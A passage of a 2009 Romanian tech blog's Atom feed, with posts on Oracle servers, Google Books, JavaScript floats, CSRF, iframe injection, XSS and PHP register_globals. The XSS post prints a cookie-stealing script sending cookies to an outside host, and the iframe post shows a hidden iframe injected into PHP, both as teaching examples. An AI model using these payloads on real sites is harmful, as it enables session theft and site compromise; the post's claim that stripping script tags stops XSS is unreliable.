type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/3675258565400159271/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/09/kasperski-si-gecad-la-conferinta.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/3675258565400159271'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/3675258565400159271'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/09/kasperski-si-gecad-la-conferinta.html' title='Kasperski si Gecad la conferinta in Bucuresti'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-3603577678972870991</id><published>2009-09-17T13:09:00.001+03:00</published><updated>2009-09-17T13:09:51.507+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='server'/><category scheme='http://www.blogger.com/atom/ns#' term='baze de date'/><category scheme='http://www.blogger.com/atom/ns#' term='oracle'/><title type='text'>Oracle a lansat cel mai rapid server din lume</title><content type='html'>Compania Oracle a lansat Exadata Version 2,  este cel mai rapid server din lume atât pentru stocare de date, cât şi pentru procesare de tranzacţii online (OLTP - online transaction processing).&lt;br /&gt;&lt;br /&gt;Exadata Database Machine Version 2, a fost creat de de Sun şi Oracle utilizând componente hardware standard din domeniu, la care se adaugă tehnologia FlashFire de la Sun, Oracle Database 11g Release 2 şi Oracle Exadata Storage Server Software Release 11.2.&lt;br /&gt;&lt;br /&gt;Exadata Version 2 este disponibilă în patru modele: rack complet (8 servere de baze de date şi 14 servere de stocare), semi-rack (4 servere de baze de date şi 7 servere de stocare), sfert de rack (2 servere de baze de date şi 3 servere de stocare) şi un sistem de bază (1 server de baze de date şi 1 server de stocare).&lt;br /&gt;&lt;br /&gt;Cu Database Machine de la Sun şi Oracle, clienţii Oracle pot stoca o cantitate de date de peste zece ori mai mare şi pot căuta datele de peste zece ori mai rapid fără a efectua vreo modificare la aplicaţii.&lt;br /&gt;&lt;br /&gt;„Exadata V2 rulează virtual toate aplicaţiile de baze de date mult mai rapid şi mai puţin costisitor decât orice alt computer din lume”, potrivit lui Larry Ellison, CEO Oracle.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-3603577678972870991?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/3603577678972870991/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/09/oracle-lansat-cel-mai-rapid-server-din.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/3603577678972870991'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/3603577678972870991'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/09/oracle-lansat-cel-mai-rapid-server-din.html' title='Oracle a lansat cel mai rapid server din lume'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-6966921020476262688</id><published>2009-09-02T13:59:00.002+03:00</published><updated>2009-09-02T14:09:45.799+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='webbunch'/><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><title type='text'>Cross-site request forgery</title><content type='html'>Cerere Cross-site falsa cunoscuta, de asemenea, ca un atac click şi abreviată ca CSRF ( "Sea-surf" ) sau XSRF, este un tip de malware, de a exploata un site web prin care comenzi neautorizate sunt transmise de la un utilizator. Spre deosebire de cross-site scripting (XSS), care exploatează "increderea" pe care un utilizator are pentru un anumit site, CSRF exploateaza "increderea" pe care un site are în browser-ul unui utilizator.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-6966921020476262688?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/6966921020476262688/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/09/cross-site-request-forgery.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/6966921020476262688'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/6966921020476262688'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/09/cross-site-request-forgery.html' title='Cross-site request forgery'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-5316917486432101439</id><published>2009-08-27T10:27:00.001+03:00</published><updated>2009-08-27T10:29:37.338+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='webbunch'/><category scheme='http://www.blogger.com/atom/ns#' term='yahoo'/><category scheme='http://www.blogger.com/atom/ns#' term='amazon'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='microsoft'/><title type='text'>Amazon, Microsoft şi Yahoo s-au unit împotriva gigantului Google</title><content type='html'>Amazon, Microsoft şi Yahoo au creat o coaliţie numită "Open Book Alliance" (Alianţa cărţilor cu acces liber) în încercarea de a opri planurile companiei Google, care intenţionează să creeze cea mai mare bibliotecă virtuală din lume, informează presa de specialitate, citată de NewsIn.&lt;br /&gt;&lt;br /&gt;Cei trei giganţi, cărora li s-au alăturat biblioteci şi asociaţii de editori din SUA şi Europa, se opun unei înţelegeri amiabile care ar putea face din Google sursa principală de cărţi scanate. "Google încearcă să monopolizeze sistemul bibliotecilor digitale. Dacă înţelegerea va funcţiona, vor da lovitura", a declarat Brewster Kahle, fondatorul Archivei de pe Internet.&lt;br /&gt;&lt;br /&gt;Totul a pornit în 2008, când compania care a creat imensul motor de căutare a ajuns la o înţelegere cu editorii şi autorii în privinţa a două procese care acuzau compania de încălcarea drepturilor de autor pentru scanarea neautorizată a cărţilor. În această înţelegere, Google a fost de acord să plătească 125 milioane de dolari pentru a crea un Registru al Drepturilor Cărţii, în care autorii şi editorii îşi pot înregistra operele, urmând să primească 70% din vânzarea lor, companiei Google revenindu-i 30% din câştiguri.&lt;br /&gt;&lt;br /&gt;Google ar fi primit şi dreptul de a digitaliza cărţi cărora nu li se cunoaşte autorul. Volumele de acest tip, pentru care nu poate pretinde nimeni drepturi de autor, se estimează că reprezintă 50-70% dintre cărţile publicate după 1923. Înţelegerea Google cu editorii şi autorii ar trebui să trebui să fie parafată până pe 4 septembrie.&lt;br /&gt;&lt;br /&gt;Arhiva pentru Internet scanează 1.000 cărţi zilnic, la preţul de 30 cenţi pagina. Această formaţiune non-profit s-a opus, de multă vreme, acestei înţelegeri dintre Google, editori şi autori. Avocatul alianţei nou-create este Gary Reback, cel care a convins Departamentul de Justiţie din SUA să demareze o anchetă asupra practicilor non-concurenţiale ale Microsoft, în anii 90.&lt;br /&gt;&lt;br /&gt;Conform datelor furnizate de compania de cercetare ComScore Inc, Google domina în iunie aproximativ 65% din piaţa motoarelor de căutare. Împreună, Microsoft şi Yahoo acopereau 28%.&lt;br /&gt;&lt;br /&gt;Gigantul informaţional Microsoft a raportat în luna iulie scăderea cu 29% a profitului net înregistrat în al patrulea trimestru fiscal, la 3,05 miliarde dolari, sau 34 cenţi pe acţiune. La rândul său, Yahoo! Inc., deţinătorul celui de-al doilea cel mai popular motor de căutare, a anunţat un profit net în creştere la 141,4 milioane dolari pentru al doilea trimestru, dar a estimat că vânzările vor scădea în trimestrul următor, din cauza reducerii bugetelor pentru publicitate.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-5316917486432101439?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/5316917486432101439/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/08/amazon-microsoft-si-yahoo-s-au-unit.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/5316917486432101439'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/5316917486432101439'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/08/amazon-microsoft-si-yahoo-s-au-unit.html' title='Amazon, Microsoft şi Yahoo s-au unit împotriva gigantului Google'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-7477975360642498948</id><published>2009-07-20T16:59:00.003+03:00</published><updated>2009-07-20T17:07:23.678+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='problema cu float'/><title type='text'>Javascript si artimetica</title><content type='html'>Incearca de curiozitate urmatoarea linie:&lt;br /&gt;&lt;br /&gt;alert(1.1+0.1);&lt;br /&gt;&lt;br /&gt;Veti primi deloc suprinzatorul si mult asteptatul rezultat 1.2000000000000002.&lt;br /&gt;O solutie explicabila din punct de vedere matematica dar comoda ca scarpinatul cu dreapta la urechea stanga ar fi sa inmultesti valorile adunate cu 1000000 si sa imparti rezultatul la 1000000.&lt;br /&gt;Problema evident este a reprezentarii float ului si modul de lucru a Js ului cu acesta.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-7477975360642498948?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/7477975360642498948/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/07/javascript-si-artimetica.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/7477975360642498948'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/7477975360642498948'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/07/javascript-si-artimetica.html' title='Javascript si artimetica'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-7151861087799708538</id><published>2009-06-18T10:42:00.006+03:00</published><updated>2009-06-18T11:09:26.985+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilitati'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe attack'/><title type='text'>Iframe attack</title><content type='html'>Se poate intampla ca toate paginile unui site au un iframe suspect cu sursa spre un site si mai suspect adaugat la final.&lt;br /&gt; Este o forma de creare trafic la site uri de genul "pirateresc" (scuzati necuvantul) dat fiind ca fiecare incarcare a paginii tale ii aduce o vizita si hackerului cu pricina.&lt;br /&gt; Aceasta e realizabila datorita unor exploituri care profita in general de drepturi scriere pe fisiere php (777 e prea generos) iar frameworkurile populare sunt principal vizate pentru ca sunt arhicunoscute directoarele, fisierele de configurare, etc.&lt;br /&gt; Majoritatea CMS urilor au un index.php in care se afiseaza tot.Daca index.php ar arata:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;br /&gt; include("header.php");&lt;br /&gt; SiteContent::showEverything();&lt;br /&gt; include("footer.php");&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;atunci o simpla injectare de forma urmatoare e suficienta sa apara iframe ul respectiv pe toate paginile site ului care trec prin index.php:&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;br /&gt; include("header.php");&lt;br /&gt; SiteContent::showEverything();&lt;br /&gt; include("footer.php");&lt;br /&gt; echo '&amp;lt;iframe src="http://www.webbunch.blogspot.com" height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no&amp;gt;&amp;lt;/iframe&amp;gt;';&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Fixingul se poate face manual cu find and replace pentru ca practic se poate injecta html ul cu iframe-ul respectiv in orice php posibil.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-7151861087799708538?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/7151861087799708538/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/06/iframe-attack.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/7151861087799708538'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/7151861087799708538'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/06/iframe-attack.html' title='Iframe attack'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-1023023961194292006</id><published>2009-06-15T14:19:00.003+03:00</published><updated>2009-06-15T14:32:48.730+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilitati'/><category scheme='http://www.blogger.com/atom/ns#' term='domo vulnerabil'/><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><category scheme='http://www.blogger.com/atom/ns#' term='emag hacked'/><title type='text'>spargere online - eMag hacked ..</title><content type='html'>Cu tot soborul de coderi de la emag , au scapat vulnerabilitati descoperite &lt;br /&gt;de http://www.alienhackers.com &lt;br /&gt;Nu e nimic grav, doar SQL Injection cu care se poate obtine "mici detalii" despre&lt;br /&gt;utilizatori.&lt;br /&gt; http://www.alienhackers.com/emag-hacked/?content=ro.&lt;br /&gt;Site ul DOMO in schimb este ceva mai vulnerabil, datele bancare fiind cam la indemana.&lt;br /&gt;Parametrii se pare ca nu sunt sanitizati citand tot http://www.alienhackers.com.&lt;br /&gt;&lt;br /&gt;Se mai intampla ce sa i faci. Totusi recomand un card cu bani limitati doar pentru diverse tranzactii de genul asta. Nu recomand sa faceti shopping cu cardu pe care sunt toate economiile dvs.&lt;br /&gt; Nu prea ramburseaza bani astia de prin Rusia si China&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-1023023961194292006?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/1023023961194292006/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/06/spargere-online-emag-hacked.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1023023961194292006'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1023023961194292006'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/06/spargere-online-emag-hacked.html' title='spargere online - eMag hacked ..'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-1861940327867331221</id><published>2009-06-04T11:23:00.003+03:00</published><updated>2009-06-04T11:29:21.861+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='webbunch'/><category scheme='http://www.blogger.com/atom/ns#' term='post vs get'/><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><title type='text'>$_REQUEST vs $_POST</title><content type='html'>Globalul $_REQUEST contine: $_COOKIE, $_GET, si $_POST la un loc si astfel&lt;br /&gt;&lt;br /&gt;daca folosesti $_REQUEST nu ai nici o garantie ca informatia venita este din post, ceea ce duce la gauri inerente de securitate.&lt;br /&gt;&lt;br /&gt;De asemenea, daca $_GET['ex'] = 'valoare'; si $_POST['ex'] = 'alta valoare'; $_REQUEST['ex'] ar fi ultima setata.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-1861940327867331221?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/1861940327867331221/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/06/request-vs-post.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1861940327867331221'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1861940327867331221'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/06/request-vs-post.html' title='$_REQUEST vs $_POST'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-563934009830311875</id><published>2009-06-01T16:32:00.004+03:00</published><updated>2009-06-01T16:35:38.498+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ratb'/><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilitati'/><category scheme='http://www.blogger.com/atom/ns#' term='hacked'/><title type='text'>Site-ul RATB a fost atacat de către hackeri - VEZI FOTO Site-ul RATB a fost atacat de către hackeri</title><content type='html'>Site-ul de prezentare a Regiei Autonome de Transport Bucureşti a fost atacat de către hackeri. Situaţia a fost însă remediată după câteva ore.&lt;br /&gt;&lt;br /&gt;Niciuna dintre paginile siteului RATB nu mai afişau informaţiile postate de către Regia Autonomă de Transport Bucureşti.&lt;br /&gt;&lt;br /&gt;Pe fiecare pagină accesată în site-ul RATB apărea însă un singur mesaj: "Hacked by Hack EliTE". &lt;br /&gt;&lt;br /&gt;Conducerea Regiei Autonome de Transport Bucureşti a declarat pentru REALITATEA.NET că nu ştie ce s-a întâmplat cu pagina de Internet a RATB. Directorul RATB, Aron Gheorghe, spune că "au mai fost ceva probleme în urma cu o lună", însă acum nu ştie ce s-a întâmplat.&lt;br /&gt;&lt;br /&gt;Şeful biroului de presă al RATB, Mihai Vlădăroiu, a declarat pentru REALITATEA.NET că situaţia a fost remediată şi că echipa de specialişti IT au încărcat o bază de date salvată în urmă cu 10 zile. "Singurele informaţii care nu apar pe site în acest moment sunt ştirile de ultimă oră, însă această problemă va fi remediată luni", a adăugat şeful biroului de presă al RATB, Mihai Vlădăroiu. &lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.realitatea.net/media/image/200905/w480/image_124315704694840000_1.jpg" alt="ratb-hacked" width="350" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-563934009830311875?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/563934009830311875/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/06/home-it-stiinta-it-site-ul-ratb-fost.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/563934009830311875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/563934009830311875'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/06/home-it-stiinta-it-site-ul-ratb-fost.html' title='Site-ul RATB a fost atacat de către hackeri - VEZI FOTO Site-ul RATB a fost atacat de către hackeri'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-1663409480666755654</id><published>2009-05-26T10:33:00.003+03:00</published><updated>2009-05-27T09:43:14.238+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='obscuritate'/><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><category scheme='http://www.blogger.com/atom/ns#' term='php'/><title type='text'>Securitatea prin obscuritate</title><content type='html'>În general, securitatea prin obscuritate este una dintre cele mai slabe forme de securitate. Dar în unele cazuri se doreşte orice sporire, cât de mică a securităţii.&lt;br /&gt;&lt;br /&gt;Câteva tehnici simple pot ajuta la ascunderea PHP, posibil încetinind un atacator care încearcă să descopere puncte slabe în sistemul dumneavoastră. Stabilind expose_php = off în fişierul php.ini, puteţi reduce cantitatea de informaţii trimisă de server.&lt;br /&gt;&lt;br /&gt;O altă tactică este configurarea serverelor web, cum ar fi Apache să prelucreze şi să interpreteze diferite tipuri de fişiere cu PHP, fie printr-o directivă .htaccess, fie direct în configuraţia Apache. Apoi puteţi utiliza extensii de fişiere, care să inducă în eroare: &lt;br /&gt;&lt;br /&gt;# Face codul PHP să arate ca alte limbaje de programare web&lt;br /&gt;AddType application/x-httpd-php .asp .py .pl&lt;br /&gt;&lt;br /&gt;# Face codul PHP să arate ca HTML&lt;br /&gt;AddType application/x-httpd-php .htm .html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-1663409480666755654?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/1663409480666755654/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/05/securitatea-prin-obscuritate.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1663409480666755654'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1663409480666755654'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/05/securitatea-prin-obscuritate.html' title='Securitatea prin obscuritate'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-6965070909508067945</id><published>2009-05-14T14:51:00.003+03:00</published><updated>2009-05-27T09:45:20.487+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilitati'/><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><title type='text'>Vulnerabilitati Cross Site Scripting (XSS)</title><content type='html'>Vulnerabilitatile Cross site scripting, sau XSS&lt;br /&gt;sunt acele scripturi introduse de un utilizator in valori data si afisate (evident si executate) unui alt utilizator.&lt;br /&gt;De exemple daca intr-o pagina de editare profil este permisa introducerea in  descriere a expresiilor javascript inclusiv taguri &amp;ltscript&amp;gt; acestea rezultatul afisarii publice lor  poate fi folosit in scopuri mailicioase de unii utilizatori.&lt;br /&gt;&lt;br /&gt;De exemplu un utilizator poate astfel colecta informatiile din cookie al altui utilizator prin un astfel de script:&lt;br /&gt;&amp;lt;script&amp;gt; &lt;br /&gt;document.location = &lt;br /&gt;   'http://www.hack-is-good.com/getcookie.php?' + &lt;br /&gt;   document.cookie; &lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;Pentru a preveni astfel de atacuri puteti filtra (escapa) datele cerute de la utilizator. Caracterele HTML &lt; si &gt; trebuiesc inlocuite cu (&amp;lt; si&amp;gt;).&lt;br /&gt;In PHP htmlspecialchars face treaba asta.&lt;br /&gt;&lt;br /&gt;Daca totusi aveti nevoie de date HTML si filtrarea HTML ului nu este posibila este &lt;br /&gt;suficient sa scoateti tagurile &amp;lt;script&amp;gt; din valoarea introdusa.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-6965070909508067945?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/6965070909508067945/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/05/vulnerabilitati-cross-site-scripting.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/6965070909508067945'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/6965070909508067945'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/05/vulnerabilitati-cross-site-scripting.html' title='Vulnerabilitati Cross Site Scripting (XSS)'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-8614406903425840010</id><published>2009-05-08T12:21:00.004+03:00</published><updated>2009-05-27T09:46:39.245+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><category scheme='http://www.blogger.com/atom/ns#' term='exemplu'/><category scheme='http://www.blogger.com/atom/ns#' term='register global'/><category scheme='http://www.blogger.com/atom/ns#' term='php'/><title type='text'>Ce este register_globals ?</title><content type='html'>O problema frecventa de securitate in PHP este register_globals din php.ini. &lt;br /&gt;Aceasta ( cu valori On sau Off) spune  &lt;br /&gt;sa inregistreze sau nu array-urile EGPCS (Environment, GET, POST, Cookie, Server) ca variabile globale.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Exemplu:&lt;br /&gt;&lt;br /&gt; register_globals=on&lt;br /&gt;&lt;br /&gt; Url ul http://www.test.ro/test.php?hacked=10 va declara by default $hacked ca variabila globala. &lt;br /&gt;&lt;br /&gt; $DOCUMENT_ROOT va fi de asemenea definit (ca element din $_SERVER .. )&lt;br /&gt;&lt;br /&gt;Register Global activat e echivalent cu initializarile:&lt;br /&gt;&lt;br /&gt;$hacked = $_GET['hacked'];&lt;br /&gt;$DOCUMENT_ROOT = $_SERVER['DOCUMENT_ROOT'];&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Evident aceasta poate fi o vulnerabilitate.&lt;br /&gt;Ex:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;register_globals=on&lt;br /&gt;&lt;br /&gt;if( isset($_POST["pass_to_delete"]) &amp;&amp; $_POST["pass_to_delete"]!="" ){&lt;br /&gt; $delete = 1;&lt;br /&gt;}&lt;br /&gt;// ... &lt;br /&gt;&lt;br /&gt;if($delete){&lt;br /&gt;  // sterge fisierele utilizatorului autentificat mai sus..&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;Un apel al URL ului cu delete=1 in $_GET duce la initializarea lui $delete = 1 fara a fi nevoie &lt;br /&gt;de parola in $_POST si astfel poate sterge neautorizat.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Cel mai bine pentru securitate este sa lasati register_globals = off.&lt;br /&gt;O programare buna implica initializarea manuala a variabilelor.&lt;br /&gt;&lt;br /&gt;Ex:&lt;br /&gt;&lt;br /&gt;$delete = 0;&lt;br /&gt;if( isset($_POST["pass_to_delete"]) &amp;&amp; $_POST["pass_to_delete"]!="" ){&lt;br /&gt; $delete = 1;&lt;br /&gt;}&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-8614406903425840010?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/8614406903425840010/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' 